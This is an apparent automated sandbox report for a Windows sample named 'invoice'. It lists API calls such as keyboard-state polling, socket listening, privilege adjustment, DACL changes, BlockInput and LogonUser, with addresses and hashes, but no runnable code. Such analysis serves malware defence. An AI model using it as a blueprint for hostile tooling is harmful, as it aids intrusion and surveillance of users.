                          • Part of subcall function 00FD852A: GetProcessHeap.KERNEL32(00000008,?,?,00FD800A,?,?,?), ref: 00FD855F
                          • Part of subcall function 00FD852A: HeapAlloc.KERNEL32(00000000,?,00FD800A,?,?,?), ref: 00FD8566
                          • Part of subcall function 00FD852A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FD857D
                          • Part of subcall function 00FD85C7: GetProcessHeap.KERNEL32(00000008,00FD8020,00000000,00000000,?,00FD8020,?), ref: 00FD85D3
                          • Part of subcall function 00FD85C7: HeapAlloc.KERNEL32(00000000,?,00FD8020,?), ref: 00FD85DA
                          • Part of subcall function 00FD85C7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00FD8020,?), ref: 00FD85EB
                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00FD8238
                        • _memset.LIBCMT ref: 00FD824D
                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00FD826C
                        • GetLengthSid.ADVAPI32(?), ref: 00FD827D
                        • GetAce.ADVAPI32(?,00000000,?), ref: 00FD82BA
                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00FD82D6
                        • GetLengthSid.ADVAPI32(?), ref: 00FD82F3
                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00FD8302
                        • HeapAlloc.KERNEL32(00000000), ref: 00FD8309
                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00FD832A
                        • CopySid.ADVAPI32(00000000), ref: 00FD8331
                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00FD8362
                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00FD8388
                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00FD839C
                        Similarity
                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                        • String ID:
                        Similarity
                        • API ID:
                        • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                        APIs
                          • Part of subcall function 01000EA5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FFFE38,?,?), ref: 01000EBC
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01000537
                          • Part of subcall function 00F89997: __itow.LIBCMT ref: 00F899C2
                          • Part of subcall function 00F89997: __swprintf.LIBCMT ref: 00F89A0C
                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 010005D6
                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0100066E
                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 010008AD
                        • RegCloseKey.ADVAPI32(00000000), ref: 010008BA
                        Similarity
                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                        • String ID:
                        APIs
                        • GetKeyboardState.USER32(?), ref: 00FE0062
                        • GetAsyncKeyState.USER32(000000A0), ref: 00FE00E3
                        • GetKeyState.USER32(000000A0), ref: 00FE00FE
                        • GetAsyncKeyState.USER32(000000A1), ref: 00FE0118
                        • GetKeyState.USER32(000000A1), ref: 00FE012D
                        • GetAsyncKeyState.USER32(00000011), ref: 00FE0145
                        • GetKeyState.USER32(00000011), ref: 00FE0157
                        • GetAsyncKeyState.USER32(00000012), ref: 00FE016F
                        • GetKeyState.USER32(00000012), ref: 00FE0181
                        • GetAsyncKeyState.USER32(0000005B), ref: 00FE0199
                        • GetKeyState.USER32(0000005B), ref: 00FE01AB
                        Similarity
                        • API ID: State$Async$Keyboard
                        • String ID:
                        APIs
                          • Part of subcall function 00F89997: __itow.LIBCMT ref: 00F899C2
                          • Part of subcall function 00F89997: __swprintf.LIBCMT ref: 00F89A0C
                        • CoInitialize.OLE32 ref: 00FF8518
                        • CoUninitialize.OLE32 ref: 00FF8523
                        • CoCreateInstance.OLE32(?,00000000,00000017,01012BEC,?), ref: 00FF8583
                        • IIDFromString.OLE32(?,?), ref: 00FF85F6
                        • VariantInit.OLEAUT32(?), ref: 00FF8690
                        • VariantClear.OLEAUT32(?), ref: 00FF86F1
                        Similarity
                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                        Similarity
                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                        • String ID:
                        APIs
                          • Part of subcall function 00F848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F848A1,?,?,00F837C0,?), ref: 00F848CE
                          • Part of subcall function 00FE4AD8: GetFileAttributesW.KERNEL32(?,00FE374F), ref: 00FE4AD9
                        • FindFirstFileW.KERNEL32(?,?), ref: 00FE38E7
                        • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00FE398F
                        • MoveFileW.KERNEL32(?,?), ref: 00FE39A2
                        • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00FE39BF
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00FE39E1
                        • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00FE39FD
                        Similarity
                        • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                        • String ID: \*.*
                        APIs
                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00FEF4CC
                        • Sleep.KERNEL32(0000000A), ref: 00FEF4FC
                        • _wcscmp.LIBCMT ref: 00FEF510
                        • _wcscmp.LIBCMT ref: 00FEF52B
                        • FindNextFileW.KERNEL32(?,?), ref: 00FEF5C9
                        • FindClose.KERNEL32(00000000), ref: 00FEF5DF
                        Similarity
                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                        • String ID: *.*
                        Similarity
                        • API ID:
                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                        Similarity
                        • API ID: _memmove
                        • String ID:
                        APIs
                          • Part of subcall function 00F848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F848A1,?,?,00F837C0,?), ref: 00F848CE
                          • Part of subcall function 00FE4AD8: GetFileAttributesW.KERNEL32(?,00FE374F), ref: 00FE4AD9
                        • FindFirstFileW.KERNEL32(?,?), ref: 00FE3BCD
                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 00FE3C1D
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00FE3C2E
                        • FindClose.KERNEL32(00000000), ref: 00FE3C45
                        • FindClose.KERNEL32(00000000), ref: 00FE3C4E
                        Similarity
                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                        • String ID: \*.*
                        APIs
                          • Part of subcall function 00FD8AA3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FD8AED
                          • Part of subcall function 00FD8AA3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FD8B1A
                          • Part of subcall function 00FD8AA3: GetLastError.KERNEL32 ref: 00FD8B27
                        • ExitWindowsEx.USER32(?,00000000), ref: 00FE52A0
                        Similarity
                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                        • String ID: $@$SeShutdownPrivilege
                        APIs
                        • socket.WSOCK32(00000002,00000001,00000006), ref: 00FF63F2
                        • WSAGetLastError.WSOCK32(00000000), ref: 00FF6401
                        • bind.WSOCK32(00000000,?,00000010), ref: 00FF641D
                        • listen.WSOCK32(00000000,00000005), ref: 00FF642C
                        • WSAGetLastError.WSOCK32(00000000), ref: 00FF6446
                        • closesocket.WSOCK32(00000000), ref: 00FF645A
                        Similarity
                        • API ID: ErrorLast$bindclosesocketlistensocket
                        • String ID:
                        APIs
                          • Part of subcall function 00FA0F36: std::exception::exception.LIBCMT ref: 00FA0F6C
                          • Part of subcall function 00FA0F36: __CxxThrowException@8.LIBCMT ref: 00FA0F81
                        • _memmove.LIBCMT ref: 00FD05AE
                        • _memmove.LIBCMT ref: 00FD06C3
                        • _memmove.LIBCMT ref: 00FD076A
                        Similarity
                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                        • String ID:
                        • API String ID: 1300846289-0
                        • Opcode ID: 9cc600a225143c47ddd23cd6e1ac423117d22da17e42b17fc8028e252790d803
                        • Instruction ID: e55f8a21575723b3c122b08040a8db8ce951ffbb8cd564d3e75fa8bf434b87d8
                        • Opcode Fuzzy Hash: 9cc600a225143c47ddd23cd6e1ac423117d22da17e42b17fc8028e252790d803
                        • Instruction Fuzzy Hash: 1902BFB1E00209DFDF14DF64D981AAE7BB5EF44310F18806AE806EB355EB35DA11EB91
                        APIs
                          • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00F819FA
                        • GetSysColor.USER32(0000000F), ref: 00F81A4E
                        • SetBkColor.GDI32(?,00000000), ref: 00F81A61
                          • Part of subcall function 00F81290: DefDlgProcW.USER32(?,00000020,?), ref: 00F812D8
                        Similarity
                        • API ID: ColorProc$LongWindow
                        • String ID:
                        • API String ID: 3744519093-0
                        • Opcode ID: 4e0d33399fde1e75ccef953ad3190a3eb9cf41a97dc7f855d94886d2d5d7e766
                        • Instruction ID: 6438a043fb775315377a3fff5f0dc653f8e6d93d796766461dc1f0d1b6fe6ff5
                        • Opcode Fuzzy Hash: 4e0d33399fde1e75ccef953ad3190a3eb9cf41a97dc7f855d94886d2d5d7e766
                        • Instruction Fuzzy Hash: 16A114B2501546FBEA3CBA29DC88EFB359DFB81361F14031AF442D2185DA6D9D02B771
                        APIs
                          • Part of subcall function 00FF7EA0: inet_addr.WSOCK32(00000000), ref: 00FF7ECB
                        • socket.WSOCK32(00000002,00000002,00000011), ref: 00FF68B4
                        • WSAGetLastError.WSOCK32(00000000), ref: 00FF68DD
                        • bind.WSOCK32(00000000,?,00000010), ref: 00FF6916
                        • WSAGetLastError.WSOCK32(00000000), ref: 00FF6923
                        • closesocket.WSOCK32(00000000), ref: 00FF6937
                        Similarity
                        • API ID: ErrorLast$bindclosesocketinet_addrsocket
                        • String ID:
                        • API String ID: 99427753-0
                        • Opcode ID: 6186e555db0b3896e30593a44b9dd8e2edf0640b4556ec7750de7baf378d2558
                        • Instruction ID: a95c839aa47d02679bc84d362f3d63a845de59dcb2eca9c883ef1cc8f90c87a6
                        • Opcode Fuzzy Hash: 6186e555db0b3896e30593a44b9dd8e2edf0640b4556ec7750de7baf378d2558
                        • Instruction Fuzzy Hash: 0941E831A00214AFDB20BF64DC86FBE77A5DF44710F44805CFA4AAB3D2DA785D01A791
                        Similarity
                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                        • String ID:
                        • API String ID: 292994002-0
                        • Opcode ID: fb6b1d07d079047dbdd44f6610ebc8affbbac864c7c6c681b6fea33aa2cd2aac
                        • Instruction ID: 2f6e3145c091869939f0125d211caffd47b03e21661dcb461c87f8bb71b4bdad
                        • Opcode Fuzzy Hash: fb6b1d07d079047dbdd44f6610ebc8affbbac864c7c6c681b6fea33aa2cd2aac
                        • Instruction Fuzzy Hash: 5511E2317001116BF7326F2ADC44BAE7B99FF48726F064028F986C7281CF7999029B95
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00FC1CB7,?), ref: 00FFC112
                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00FFC124
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                        • API String ID: 2574300362-1816364905
                        • Opcode ID: c926743d492ad1aeeea27cad26ee9f3aaa75629111c93edbbe3c12c8e325b35d
                        • Instruction ID: 9dffbc26789600307be117e222c1a2a07f390c258d9643ced7e4c3faebedeb39
                        • Opcode Fuzzy Hash: c926743d492ad1aeeea27cad26ee9f3aaa75629111c93edbbe3c12c8e325b35d
                        • Instruction Fuzzy Hash: 36E0867450072B8FD7315B26C418A9176D4EF09354F408429D4C5D2110D7F8C840DBA0
                        Similarity
                        • API ID: __itow__swprintf
                        • String ID:
                        • API String ID: 674341424-0
                        • Opcode ID: 3efa6a3f5b4b7e67734b9c5ec76473343b77843c04e1f82356187e35ccffca36
                        • Instruction ID: c127d9b42756a0741ffbdfd1cabddb7e9e0fe1125be51646bc23f968c80486c0
                        • Opcode Fuzzy Hash: 3efa6a3f5b4b7e67734b9c5ec76473343b77843c04e1f82356187e35ccffca36
                        • Instruction Fuzzy Hash: 2D229F715083029FDB24EF24C881BAFB7E4BF84714F18491DF49697291DB75EA04EB92
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00FFEF51
                        • Process32FirstW.KERNEL32(00000000,?), ref: 00FFEF5F
                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                        • Process32NextW.KERNEL32(00000000,?), ref: 00FFF01F
                        • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00FFF02E
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                        • String ID:
                        • API String ID: 2576544623-0
                        • Opcode ID: b02087dc078ee417d2c42e5f26ae29f67b9a36fbbcdcf0aad3f8f49a40d4e024
                        • Instruction ID: 43d1c5acd2a2e7323752c6e6e1018e606b172c82ea10d804a6e97f805de343da
                        • Opcode Fuzzy Hash: b02087dc078ee417d2c42e5f26ae29f67b9a36fbbcdcf0aad3f8f49a40d4e024
                        • Instruction Fuzzy Hash: D1517F715083119FD320EF20DC85EABB7E8AF94B10F54482DF596972A1EB74D908DB92
                        APIs
                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00FDE93A
                        Similarity
                        • API ID: lstrlen
                        • String ID: ($|
                        • API String ID: 1659193697-1631851259
                        • Opcode ID: 2d705bffaa61f84058b3173effeb2a8c959f560a9748ff167eac43a41adba94f
                        • Instruction ID: ec6e0b6535a30a42b57b247267dd75abc085c08d84e6d5e2d8346f880ca763b7
                        • Opcode Fuzzy Hash: 2d705bffaa61f84058b3173effeb2a8c959f560a9748ff167eac43a41adba94f
                        • Instruction Fuzzy Hash: 9D321575A006059FC728DF19C481A6AB7F2FF48720B15C56EE89ADB3A1EB70E941DB40
                        APIs
                        • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00FF1920,00000000), ref: 00FF24F7
                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00FF252E
                        Similarity
                        • API ID: Internet$AvailableDataFileQueryRead
                        • String ID:
                        • API String ID: 599397726-0
                        • Opcode ID: 258d907a0f75aa16e7ab8341eadc0b4a5e1f45ccaa3b78c61d1bec7ba5100c79
                        • Instruction ID: 10476a93b67371ed9da59c814bd8d2f137ed6112b0b6ea49337e274a8bb73eb1
                        • Opcode Fuzzy Hash: 258d907a0f75aa16e7ab8341eadc0b4a5e1f45ccaa3b78c61d1bec7ba5100c79
                        • Instruction Fuzzy Hash: 3841F3B290020DBFEB60DE94DC85FBBB7ACEF40724F14406AF701A6161DBB49E40A660
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 00FEB3CF
                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00FEB429
                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00FEB476
                        Similarity
                        • API ID: ErrorMode$DiskFreeSpace
                        • String ID:
                        • API String ID: 1682464887-0
                        • Opcode ID: 17686f5b8a218f8e0de111ba29afe6e75f1be017b0d0b12cba09b36979e92867
                        • Instruction ID: 5fb80a7844e87c69f85fc18370d2c422698f8135c209aa4bdb6ad1aecf981d3f
                        • Opcode Fuzzy Hash: 17686f5b8a218f8e0de111ba29afe6e75f1be017b0d0b12cba09b36979e92867
                        • Instruction Fuzzy Hash: 15216D35A00118EFCB00EFA5D884AEEBBF8FF49310F1480A9E845AB355CB359915DB51
                        APIs
                          • Part of subcall function 00FA0F36: std::exception::exception.LIBCMT ref: 00FA0F6C
                          • Part of subcall function 00FA0F36: __CxxThrowException@8.LIBCMT ref: 00FA0F81
                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FD8AED
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FD8B1A
                        • GetLastError.KERNEL32 ref: 00FD8B27
                        Similarity
                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                        • String ID:
                        • API String ID: 1922334811-0
                        • Opcode ID: 9adf5c61ade28560d46c4b2877759ea4bbc431e425f1e61b420f761045b693fb
                        • Instruction ID: cd77b192e68827913030bb37066a701f49fb9e9db7c5ab73b591e49efee144ab
                        • Opcode Fuzzy Hash: 9adf5c61ade28560d46c4b2877759ea4bbc431e425f1e61b420f761045b693fb
                        • Instruction Fuzzy Hash: 3211C1B2914205AFD728DF54EC85D2BB7BDFB44320B24816EF49697240EB34BC01DB60
                        APIs
                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00FE4A31
                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00FE4A48
                        • FreeSid.ADVAPI32(?), ref: 00FE4A58
                        Similarity
                        • API ID: AllocateCheckFreeInitializeMembershipToken
                        • String ID:
                        • API String ID: 3429775523-0
                        • Opcode ID: 1da4f322106c95918c34a558b86b60f29f86fa13a572a211e6e9f89f78be1f26
                        • Instruction ID: 9360c4e934dfeed8aa0bfd84f7d9013eeeb8576b870ae8ea907fcd3f9b65eb66
                        • Opcode Fuzzy Hash: 1da4f322106c95918c34a558b86b60f29f86fa13a572a211e6e9f89f78be1f26
                        • Instruction Fuzzy Hash: 77F04975A5130DBFDF10DFF0D889AAEBBBCEF08611F0044A9B901E2180E6756A049B50
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 79d7d03cddd8e72f2a2171ae3c7b4dfea98dc4e1eefe0abac294232f57c1d9df
                        • Instruction ID: 7fa75093999355140deb762f4d5ea8c5661392715a24800cf797803d8ad6980c
                        • Opcode Fuzzy Hash: 79d7d03cddd8e72f2a2171ae3c7b4dfea98dc4e1eefe0abac294232f57c1d9df
                        • Instruction Fuzzy Hash: 7C22AD75E002169FDB24EF54C885BEEBBB0FF05320F148069E856AB341E774AD85EB91
                        APIs
                        • FindFirstFileW.KERNEL32(?,?), ref: 00FEC787
                        • FindClose.KERNEL32(00000000), ref: 00FEC7B7
                        Similarity
                        • API ID: Find$CloseFileFirst
                        • String ID:
                        • API String ID: 2295610775-0
                        • Opcode ID: c87092762dd256dd582a401765d4dad0d5e6979562754a4575ffd578de7a29f6
                        • Instruction ID: fa34daa4e8e613c07b65a711e28173e658116ddb9051c67a1530e71c89a6b084
                        • Opcode Fuzzy Hash: c87092762dd256dd582a401765d4dad0d5e6979562754a4575ffd578de7a29f6
                        • Instruction Fuzzy Hash: 7E11A1326046009FD714EF69D885A6AF7E9FF84320F04851EF9AAD7391DB74AC01EB81
                        APIs
                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00FF957D,?,0100FB84,?), ref: 00FEA121
                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00FF957D,?,0100FB84,?), ref: 00FEA133
                        Similarity
                        • API ID: ErrorFormatLastMessage
                        • String ID:
                        • API String ID: 3479602957-0
                        • Opcode ID: 77404648d9f0b90790e93a07e14c9d1d996f996cb24702d625595acdde92001c
                        • Instruction ID: 466cfe0111811449971b2148e246e40954933a05835a4ca05854d3ef4f6ba9aa
                        • Opcode Fuzzy Hash: 77404648d9f0b90790e93a07e14c9d1d996f996cb24702d625595acdde92001c
                        • Instruction Fuzzy Hash: 9FF0823550522DBBDB21AFA5CC48FEA776CFF08361F008155B909D6185DA38A940EFB1
                        APIs
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FD8631), ref: 00FD8508
                        • CloseHandle.KERNEL32(?,?,00FD8631), ref: 00FD851A
                        Similarity
                        • API ID: AdjustCloseHandlePrivilegesToken
                        • String ID:
                        • API String ID: 81990902-0
                        • Opcode ID: d131dbdf5efd8db59c3ffe6abaec6c7269a535629f08557dc212134c26827744
                        • Instruction ID: c238c868ee6ea4485bd310a5d2555534c40137638f4f3652bece819977fe1866
                        • Opcode Fuzzy Hash: d131dbdf5efd8db59c3ffe6abaec6c7269a535629f08557dc212134c26827744
                        • Instruction Fuzzy Hash: D2E0B6B2014611AFE7362B64FC09E777BA9EB44360B148829B49680474DB66ACA1EB50
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00FA8ED7,?,?,?,00000001), ref: 00FAA2DA
                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00FAA2E3
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: 24ac1b1fe2deba4a713710893888f6c4748d3154f028e21336111b0813d9435c
                        • Instruction ID: ba911ee3f23f9caee27f7313bd55e44b60a8e859c6b05a48578a50b6a603392c
                        • Opcode Fuzzy Hash: 24ac1b1fe2deba4a713710893888f6c4748d3154f028e21336111b0813d9435c
                        • Instruction Fuzzy Hash: 87B0923105820AABCA222B91E809B883F68EB45AB2F408010F64D84054CBE75450AB91
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9e83661307f15068a5705f6cc669f9401f2e70963b77f0f4d97bb64865c02e17
                        • Instruction ID: e6420eb709e74df7eaf6d29e0c61b1a4ba5a6327ee2c7b2ec368cec0ad507d0e
                        • Opcode Fuzzy Hash: 9e83661307f15068a5705f6cc669f9401f2e70963b77f0f4d97bb64865c02e17
                        • Instruction Fuzzy Hash: 0E323372D29F014DD7239534C872336A259AFB73D4F15D737E81AB9A9AEB2DC4831200
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 75e986ec55450f1a498abf52368ed95ce91be60856fb1174165bc768d38c5b78
                        • Instruction ID: 689147f18574f3718fdafa9454533f1ebbb904efef1d418d2e1a962ac4c08e58
                        • Opcode Fuzzy Hash: 75e986ec55450f1a498abf52368ed95ce91be60856fb1174165bc768d38c5b78
                        • Instruction Fuzzy Hash: D1B10130E2AF808DD32396398831336B64CAFBB2D5F51D71BFC6675D16EB2A85834240
                        APIs
                        • __time64.LIBCMT ref: 00FE8944
                          • Part of subcall function 00FA537A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00FE9017,00000000,?,?,?,?,00FE91C8,00000000,?), ref: 00FA5383
                          • Part of subcall function 00FA537A: __aulldiv.LIBCMT ref: 00FA53A3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Time$FileSystem__aulldiv__time64
                        • String ID:
                        • API String ID: 2893107130-0
                        • Opcode ID: 1cb17c33bd94c2b326db27a5e344e1519259ec7fe9dfaecc97473de958dc5e5b
                        • Instruction ID: ad9dc5823598269e3396032a7ff08a52b2233f321bdfcb7d615b8e410eba9044
                        • Opcode Fuzzy Hash: 1cb17c33bd94c2b326db27a5e344e1519259ec7fe9dfaecc97473de958dc5e5b
                        • Instruction Fuzzy Hash: DA21E772A35510CBC729CF25D481B51B3E1EFA5320F288E2CD5E9CB2C0DA35B905DB50
                        APIs
                        • BlockInput.USER32(00000001), ref: 00FF403A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: BlockInput
                        • String ID:
                        • API String ID: 3456056419-0
                        • Opcode ID: 62c45bb54dc152b8377b986941d4461b9d8b84affebd18d07557ddae4befd79a
                        • Instruction ID: 9e36988f180263b4d87c8535fe04ec0cabe14c55da99961ffed77baa199faad1
                        • Opcode Fuzzy Hash: 62c45bb54dc152b8377b986941d4461b9d8b84affebd18d07557ddae4befd79a
                        • Instruction Fuzzy Hash: 07E048322041155FC724AF59D844EA7FBD8AF64760F048015FD4AD7351DAB5F840DB90
                        APIs
                        • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00FE4D1D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: mouse_event
                        • String ID:
                        • API String ID: 2434400541-0
                        • Opcode ID: c2c973c1ca89b74aa6d96187875c56d4201d1fd7d799c41069f9bea4ddc01df3
                        • Instruction ID: b8b10d21bb590d47887f303166b40ad585957d4f6de1f0ff27dae4248ea4e396
                        • Opcode Fuzzy Hash: c2c973c1ca89b74aa6d96187875c56d4201d1fd7d799c41069f9bea4ddc01df3
                        • Instruction Fuzzy Hash: B4D09EA556468779FC380B269C2FB76210AF3017A6FA4454E7602962C5A8E97841B835
                        APIs
                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00FD86B1), ref: 00FD8A93
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: LogonUser
                        • String ID:
                        • API String ID: 1244722697-0
                        • Opcode ID: d964a5787d7df9de172d9475a189f8da83195656b52cbc5850138eabfed1e787
                        • Instruction ID: d5db774f1666c6f62323c3dd4bfd4c7f6edbeb51ab8a456ad5ae6c28cd0376f8
                        • Opcode Fuzzy Hash: d964a5787d7df9de172d9475a189f8da83195656b52cbc5850138eabfed1e787
